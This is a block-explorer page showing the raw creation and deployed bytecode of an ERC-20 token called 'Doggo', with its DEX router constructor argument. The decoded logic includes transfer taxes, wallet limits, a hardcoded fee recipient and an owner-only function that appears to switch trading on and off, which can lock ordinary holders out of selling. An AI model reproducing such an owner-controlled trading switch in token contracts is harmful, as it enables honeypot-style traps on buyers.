40902092909255841614158061086e575061086e8484610e7e565b156108955761087d8484610e7e565b6108875781610892565b610892848484610ec4565b90505b6001600160a01b0383166000908152600560205260409020546108b89082610fb8565b6001600160a01b0380851660008181526005602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061090c9085815260200190565b60405180910390a350505050565b6000818484111561093e5760405162461bcd60e51b815260040161042b91906114de565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0383166109fa5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161042b565b6001600160a01b038216610a5c5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161042b565b60008111610abe5760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b606482015260840161042b565b6001600160a01b038316600090815260056020526040902054811115610b405760405162461bcd60e51b815260206004820152603160248201527f596f752061726520747279696e6720746f207472616e73666572206d6f7265206044820152707468616e20796f75722062616c616e636560781b606482015260840161042b565b505050565b6001600160a01b03821660009081526007602052604090205460ff16158015610b8757506001600160a01b03811660009081526007602052604090205460ff16155b15610bd657600a54600160a01b900460ff16610bd65760405162461bcd60e51b815260206004820152600e60248201526d1d1c98591a5b99d05b1b1bddd95960921b604482015260640161042b565b5050565b6001600160a01b03831660009081526007602052604090205460ff16158015610c1c57506001600160a01b03821660009081526007602052604090205460ff16155b8015610c365750600a546001600160a01b03838116911614155b8015610c4d57506001600160a01b03821661dead14155b15610b4057610c5a6105df565b6001600160a01b038316600090815260056020526040902054610c7d9083610fb8565b1115610b405760405162461bcd60e51b815260206004820152601e60248201527f45786365656473206d6178696d756d2077616c6c657420616d6f756e742e0000604482015260640161042b565b600a546001600160a01b038281169116148015610d0157506001600160a01b03821660009081526007602052604090205460ff16155b15610bd657600160146000828254610d1991906116ce565b90915550505050565b600a546001600160a01b03848116911614610dc857610d3f6104c6565b81111580610d6557506001600160a01b03831660009081526007602052604090205460ff165b80610d8857506001600160a01b03821660009081526007602052604090205460ff165b610dc85760405162461bcd60e51b8152602060048201526011602482015270151608131a5b5a5d08115e18d959591959607a1b604482015260640161042b565b610dd06105ef565b81111580610df657506001600160a01b03831660009081526007602052604090205460ff165b80610e1957506001600160a01b03821660009081526007602052604090205460ff165b610b405760405162461bcd60e51b8152602060048201526011602482015270151608131a5b5a5d08115e18d959591959607a1b604482015260640161042b565b610e64838383610fc4565b15610b4057610e74601654611076565b6000601455505050565b6001600160a01b03821660009081526007602052604081205460ff1615801561054d5750506001600160a01b031660009081526007602052604090205460ff1615919050565b600080610ed18585611207565b1115610fb1576000610efa610ee68686611207565b601254610ef49086906112a8565b906112b4565b30600090815260056020526040902054909150610f179082610fb8565b30600081815260056020526040908190209290925590516001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610f689085815260200190565b60405180910390a3600e5415610f9f57610f9f3061dead610f9a600e54610ef4601254896112a890919063ffffffff16565b6107d7565b610fa983826107cb565b91505061054d565b5092915050565b600061054d82846116ce565b6017546016543060009081526005602052604081205460155491938510159211159060ff16158015610ff8575060135460ff165b801561100d5750600a54600160a01b900460ff165b80156110165750815b801561103b57506001600160a01b03861660009081526007602052604090205460ff16155b80156110545750600a546001600160a01b038681169116145b80156110635750600160145410155b801561106c5750805b9695505050505050565b6015805460ff19166001908117909155600d54600c54600b546000936110b093600293610ef49391926110aa928391610fb8565b90610fb8565b905060006110d3826110cd600b54866112b490919063ffffffff16565b906112a8565b905060006110e184836107cb565b9050476110ed826112c0565b60006110f947836107cb565b9050600061111c611115600b54886107cb90919063ffffffff16565b83906112a8565b90506000611135600b54836112b490919063ffffffff16565b9050801561114757611147868261141a565b600c5460009061115c90610ef48560026112b4565b905080156111a75760405173d882a37163736872131b6b808083a5b39f8c17169082156108fc029083906000818181858888f193505050501580156111a5573d6000803e3d6000fd5b505b4780156111f15760405173d882a37163736872131b6b808083a5b39f8c17169082156108fc029083906000818181858888f193505050501580156111ef573d6000803e3d6000fd5b505b50506015805460ff191690555050505050505050565b6001600160a01b03821660009081526008602052604081205460ff168061124657506001600160a01b03821660009081526008602052604090205460ff165b15611260576012546112599060646107cb565b90506103fb565b600a546001600160a01b039081169083160361127f57506010546103fb565b600a546001600160a01b039081169084160361129e5750600f546103fb565b5060115492915050565b600061054d8284611699565b600061054d8284611682565b60408051600280825260608201835260009260208301908036833701905050905030816000815181106112f5576112f56116e1565b6001600160a01b03928316602091820292909201810191909152600954604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa15801561134e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061137291906116f7565b81600181518110611385576113856116e1565b6001600160a01b0392831660209182029290920101526009546113ab91309116846106a7565b60095460405163791ac94760e01b81526001600160a01b039091169063791ac947906113e4908590600090869030904290600401611714565b600060405180830381600087803b1580156113fe57600080fd5b505af1158015611412573d6000803e3d6000fd5b505050505050565b6009546114329030906001600160a01b0316846106a7565b60095460405163f305d71960e01b815230600482015260248101849052600060448201819052606482015273d882a37163736872131b6b808083a5b39f8c171660848201524260a48201526001600160a01b039091169063f305d71990839060c40160606040518083038185885af11580156114b2573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906114d79190611785565b5050505050565b600060208083528351808285015260005b8181101561150b578581018301518582016040015282016114ef565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146106a457600080fd5b6000806040838503121561155457600080fd5b823561155f8161152c565b946020939093013593505050565b60008060006060848603121561158257600080fd5b833561158d8161152c565b9250602084013561159d8161152c565b929592945050506040919091013590565b6000602082840312156115c057600080fd5b813561054d8161152c565b600080604083850312156115de57600080fd5b82356115e98161152c565b9150602083013580151581146115fe57600080fd5b809150509250929050565b6000806040838503121561161c57600080fd5b82356116278161152c565b915060208301356115fe8161152c565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b80820281158282048414176103fb576103fb61166c565b6000826116b657634e487b7160e01b600052601260045260246000fd5b500490565b818103818111156103fb576103fb61166c565b808201808211156103fb576103fb61166c565b634e487b7160e01b600052603260045260246000fd5b60006020828403121561170957600080fd5b815161054d8161152c565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156117645784516001600160a01b03168352938301939183019160010161173f565b50506001600160a01b03969096166060850152505050608001529392505050565b60008060006060848603121561179a57600080fd5b835192506020840151915060408401519050925092509256fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122047405bf44674ede6d533161594e169d1704ab22e6d3379fc15aad58eb027be8c64736f6c63430008130033000000000000000000000000d9e1ce17f2641f24ae83637ab66a2cca9c378b9f

Deployed Bytecode

0x6080604052600436106101185760003560e01c806370a08231116100a057806395d89b411161006457806395d89b4114610316578063a8aa1b3114610344578063a9059cbb14610364578063dd62ed3e14610384578063f2fde38b146103ca57600080fd5b806370a082311461026f578063715018a6146102a557806378109e54146102ba5780637d1db4a5146102cf5780638da5cb5b146102e457600080fd5b80631f976b7e116100e75780631f976b7e146101ce57806323b872dd146101e3578063313ce567146102035780633f4218e01461021f57806348ff2b8b1461024f57600080fd5b806306fdde0314610124578063095ea7b3146101645780630f120fc31461019457806318160ddd146101ab57600080fd5b3661011f57005b600080fd5b34801561013057600080fd5b50604080518082019091526005815264446f67676f60d81b60208201525b60405161015b91906114de565b60405180910390f35b34801561017057600080fd5b5061018461017f366004611541565b6103ea565b604051901515815260200161015b565b3480156101a057600080fd5b506101a9610401565b005b3480156101b757600080fd5b506101c0610455565b60405190815260200161015b565b3480156101da57600080fd5b506101c06104c6565b3480156101ef57600080fd5b506101846101fe36600461156d565b6104ea565b34801561020f57600080fd5b506040516009815260200161015b565b34801561022b57600080fd5b5061018461023a3660046115ae565b60076020526000908152604090205460ff1681565b34801561025b57600080fd5b506101a961026a3660046115cb565b610554565b34801561027b57600080fd5b506101c061028a3660046115ae565b6001600160a01b031660009081526005602052604090205490565b3480156102b157600080fd5b506101a96105a9565b3480156102c657600080fd5b506101c06105df565b3480156102db57600080fd5b506101c06105ef565b3480156102f057600080fd5b506000546001600160a01b03165b6040516001600160a01b03909116815260200161015b565b34801561032257600080fd5b50604080518082019091526005815264444f47474f60d81b602082015261014e565b34801561035057600080fd5b50600a546102fe906001600160a01b031681565b34801561037057600080fd5b5061018461037f366004611541565b6105ff565b34801561039057600080fd5b506101c061039f366004611609565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b3480156103d657600080fd5b506101a96103e53660046115ae565b61060c565b60006103f73384846106a7565b5060015b92915050565b6000546001600160a01b031633146104345760405162461bcd60e51b815260040161042b90611637565b60405180910390fd5b600a805460ff60a01b198116600160a01b9182900460ff1615909102179055565b60056020527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc5461dead60009081527f7d509c07f0d4edcc2dd1b53aae68677132eb562dcba78e36381b63ccaf66e6ba5460015491926104c19290916104bb91906107cb565b906107cb565b905090565b60006012546003546104d6610455565b6104e09190611682565b6104c19190611699565b60006104f78484846107d7565b6105498433610544856040518060600160405280602881526020016117b4602891396001600160a01b038a166000908152600660209081526040808320338452909152902054919061091a565b6106a7565b5060015b9392505050565b6000546001600160a01b0316331461057e5760405162461bcd60e51b815260040161042b90611637565b6001600160a01b03919091166000908152600760205260409020805460ff1916911515919091179055565b6000546001600160a01b031633146105d35760405162461bcd60e51b815260040161042b90611637565b6105dd6000610946565b565b60006012546004546104d6610455565b60006012546002546104d6610455565b60006103f73384846107d7565b6000546001600160a01b031633146106365760405162461bcd60e51b815260040161042b90611637565b6001600160a01b03811661069b5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161042b565b6106a481610946565b50565b6001600160a01b0383166107095760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161042b565b6001600160a01b03821661076a5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161042b565b6001600160a01b0383811660008181526006602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061054d82846116bb565b6107e2838383610996565b6107ec8383610b45565b6107f7838383610bda565b6108018383610ccb565b61080c838383610d22565b610817838383610e59565b6018546001600160a01b03841660009081526005602052604090205461083d90836107cb565b6001600160a01b03808616600081815260056020526040902092909255841614158061086e575061086e8484610e7e565b156108955761087d8484610e7e565b6108875781610892565b610892848484610ec4565b90505b6001600160a01b0383166000908152600560205260409020546108b89082610fb8565b6001600160a01b0380851660008181526005602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061090c9085815260200190565b60405180910390a350505050565b6000818484111561093e5760405162461bcd60e51b815260040161042b91906114de565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0383166109fa5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161042b565b6001600160a01b038216610a5c5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161042b565b60008111610abe5760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b606482015260840161042b565b6001600160a01b038316600090815260056020526040902054811115610b405760405162461bcd60e51b815260206004820152603160248201527f596f752061726520747279696e6720746f207472616e73666572206d6f7265206044820152707468616e20796f75722062616c616e636560781b606482015260840161042b565b505050565b6001600160a01b03821660009081526007602052604090205460ff16158015610b8757506001600160a01b03811660009081526007602052604090205460ff16155b15610bd657600a54600160a01b900460ff16610bd65760405162461bcd60e51b815260206004820152600e60248201526d1d1c98591a5b99d05b1b1bddd95960921b604482015260640161042b565b5050565b6001600160a01b03831660009081526007602052604090205460ff16158015610c1c57506001600160a01b03821660009081526007602052604090205460ff16155b8015610c365750600a546001600160a01b03838116911614155b8015610c4d57506001600160a01b03821661dead14155b15610b4057610c5a6105df565b6001600160a01b038316600090815260056020526040902054610c7d9083610fb8565b1115610b405760405162461bcd60e51b815260206004820152601e60248201527f45786365656473206d6178696d756d2077616c6c657420616d6f756e742e0000604482015260640161042b565b600a546001600160a01b038281169116148015610d0157506001600160a01b03821660009081526007602052604090205460ff16155b15610bd657600160146000828254610d1991906116ce565b90915550505050565b600a546001600160a01b03848116911614610dc857610d3f6104c6565b81111580610d6557506001600160a01b03831660009081526007602052604090205460ff165b80610d8857506001600160a01b03821660009081526007602052604090205460ff165b610dc85760405162461bcd60e51b8152602060048201526011602482015270151608131a5b5a5d08115e18d959591959607a1b604482015260640161042b565b610dd06105ef565b81111580610df657506001600160a01b03831660009081526007602052604090205460ff165b80610e1957506001600160a01b03821660009081526007602052604090205460ff165b610b405760405162461bcd60e51b8152602060048201526011602482015270151608131a5b5a5d08115e18d959591959607a1b604482015260640161042b565b610e64838383610fc4565b15610b4057610e74601654611076565b6000601455505050565b6001600160a01b03821660009081526007602052604081205460ff1615801561054d5750506001600160a01b031660009081526007602052604090205460ff1615919050565b600080610ed18585611207565b1115610fb1576000610efa610ee68686611207565b601254610ef49086906112a8565b906112b4565b30600090815260056020526040902054909150610f179082610fb8565b30600081815260056020526040908190209290925590516001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610f689085815260200190565b60405180910390a3600e5415610f9f57610f9f3061dead610f9a600e54610ef4601254896112a890919063ffffffff16565b6107d7565b610fa983826107cb565b91505061054d565b5092915050565b600061054d82846116ce565b6017546016543060009081526005602052604081205460155491938510159211159060ff16158015610ff8575060135460ff165b801561100d5750600a54600160a01b900460ff165b80156110165750815b801561103b57506001600160a01b03861660009081526007602052604090205460ff16155b80156110545750600a546001600160a01b038681169116145b80156110635750600160145410155b801561106c5750805b9695505050505050565b6015805460ff19166001908117909155600d54600c54600b546000936110b093600293610ef49391926110aa928391610fb8565b90610fb8565b905060006110d3826110cd600b54866112b490919063ffffffff16565b906112a8565b905060006110e184836107cb565b9050476110ed826112c0565b60006110f947836107cb565b9050600061111c611115600b54886107cb90919063ffffffff16565b83906112a8565b90506000611135600b54836112b490919063ffffffff16565b9050801561114757611147868261141a565b600c5460009061115c90610ef48560026112b4565b905080156111a75760405173d882a37163736872131b6b808083a5b39f8c17169082156108fc029083906000818181858888f193505050501580156111a5573d6000803e3d6000fd5b505b4780156111f15760405173d882a37163736872131b6b808083a5b39f8c17169082156108fc029083906000818181858888f193505050501580156111ef573d6000803e3d6000fd5b505b50506015805460ff191690555050505050505050565b6001600160a01b03821660009081526008602052604081205460ff168061124657506001600160a01b03821660009081526008602052604090205460ff165b15611260576012546112599060646107cb565b90506103fb565b600a546001600160a01b039081169083160361127f57506010546103fb565b600a546001600160a01b039081169084160361129e5750600f546103fb565b5060115492915050565b600061054d8284611699565b600061054d8284611682565b60408051600280825260608201835260009260208301908036833701905050905030816000815181106112f5576112f56116e1565b6001600160a01b03928316602091820292909201810191909152600954604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa15801561134e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061137291906116f7565b81600181518110611385576113856116e1565b6001600160a01b0392831660209182029290920101526009546113ab91309116846106a7565b60095460405163791ac94760e01b81526001600160a01b039091169063791ac947906113e4908590600090869030904290600401611714565b600060405180830381600087803b1580156113fe57600080fd5b505af1158015611412573d6000803e3d6000fd5b505050505050565b6009546114329030906001600160a01b0316846106a7565b60095460405163f305d71960e01b815230600482015260248101849052600060448201819052606482015273d882a37163736872131b6b808083a5b39f8c171660848201524260a48201526001600160a01b039091169063f305d71990839060c40160606040518083038185885af11580156114b2573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906114d79190611785565b5050505050565b600060208083528351808285015260005b8181101561150b578581018301518582016040015282016114ef565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146106a457600080fd5b6000806040838503121561155457600080fd5b823561155f8161152c565b946020939093013593505050565b60008060006060848603121561158257600080fd5b833561158d8161152c565b9250602084013561159d8161152c565b929592945050506040919091013590565b6000602082840312156115c057600080fd5b813561054d8161152c565b600080604083850312156115de57600080fd5b82356115e98161152c565b9150602083013580151581146115fe57600080fd5b809150509250929050565b6000806040838503121561161c57600080fd5b82356116278161152c565b915060208301356115fe8161152c565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b80820281158282048414176103fb576103fb61166c565b6000826116b657634e487b7160e01b600052601260045260246000fd5b500490565b818103818111156103fb576103fb61166c565b808201808211156103fb576103fb61166c565b634e487b7160e01b600052603260045260246000fd5b60006020828403121561170957600080fd5b815161054d8161152c565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156117645784516001600160a01b03168352938301939183019160010161173f565b50506001600160a01b03969096166060850152505050608001529392505050565b60008060006060848603121561179a57600080fd5b835192506020840151915060408401519050925092509256fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122047405bf44674ede6d533161594e169d1704ab22e6d3379fc15aad58eb027be8c64736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000d9e1ce17f2641f24ae83637ab66a2cca9c378b9f

-----Decoded View---------------
Arg [0] : dex (address): 0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000d9e1ce17f2641f24ae83637ab66a2cca9c378b9f


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.